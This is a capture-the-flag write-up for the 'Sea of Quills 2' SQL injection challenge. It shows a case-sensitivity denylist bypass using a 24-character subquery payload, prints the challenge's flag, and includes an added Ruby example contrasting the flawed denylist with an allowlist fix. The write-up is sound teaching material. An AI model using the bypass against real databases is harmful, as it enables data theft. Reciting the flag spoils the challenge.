Sea of Quills 2

Description

A little bird told me my original quills store was vulnerable to illegal hacking! I've fixed my store now though, and now it should be impossible to hack!

Source

Solution

For the preliminary analysis, see the writeup of the original Sea of Quills level.

Compared to the original level, there are two differences:

1. The word flag has been added to the blacklist:

blacklist = ["-", "/", ";", "'", "\"", "flag"]

2. The column expression we inject must not exceed 24 characters, and the limit and offset must be purely numeric:

if cols.length > 24 || !/^[0-9]+$/.match?(lim) || !/^[0-9]+$/.match?(off)
    return "bad, no quills for you!"
end

The first check is bypassed by writing the table name in uppercase, FLAGTABLE, because the blacklist is matched case-sensitively and uppercase characters are not filtered. The second check is satisfied by a subquery that is exactly 24 characters long:

(SELECT* FROM FLAGTABLE)
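As an added example (not code from the writeup or the challenge), here is the denylist check reconstructed in Ruby next to an allowlist validator, which is the fix for this class of bypass; the column names in the allowlist are assumed for illustration.

```ruby
# Added example, not the challenge's own source: the denylist check reconstructed
# from the snippet above, next to an allowlist validator. The column names in
# ALLOWED_COLS are assumed for illustration and are not from the challenge.
BLACKLIST = ["-", "/", ";", "'", "\"", "flag"].freeze

# The challenge's style of check: a length cap, numeric-only lim/off, and a
# case-sensitive substring denylist on the column expression.
def denylist_rejects?(cols, lim, off)
  return true if cols.length > 24 || !/^[0-9]+$/.match?(lim) || !/^[0-9]+$/.match?(off)
  BLACKLIST.any? { |word| cols.include?(word) }
end

# Hardened form: only comma-separated known column names are accepted, so the
# value never reaches the SQL string as free-form text; \A and \z anchor the
# whole value rather than a single line.
ALLOWED_COLS = %w[name desc price].freeze

def allowlist_accepts?(cols, lim, off)
  return false unless /\A[0-9]+\z/.match?(lim) && /\A[0-9]+\z/.match?(off)
  parts = cols.split(",").map(&:strip)
  !parts.empty? && parts.all? { |c| ALLOWED_COLS.include?(c) }
end

if __FILE__ == $PROGRAM_NAME
  payload = "(SELECT* FROM FLAGTABLE)"
  puts "denylist rejects payload? #{denylist_rejects?(payload, '1', '0')}"   # false
  puts "allowlist accepts payload? #{allowlist_accepts?(payload, '1', '0')}" # false
end
```

The denylist lets the uppercase payload through while the allowlist rejects anything that is not a known column name, regardless of case or length tricks.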

FLAG >> actf{the_time_we_have_spent_together_riding_through_this_english_denylist_c0776ee734497ca81cbd55ea}

Original writeup (https://github.com/K1nd4SUS/CTF-Writeups/tree/main/%C3%A5ngstromCTF_2021/Sea%20of%20Quills%202).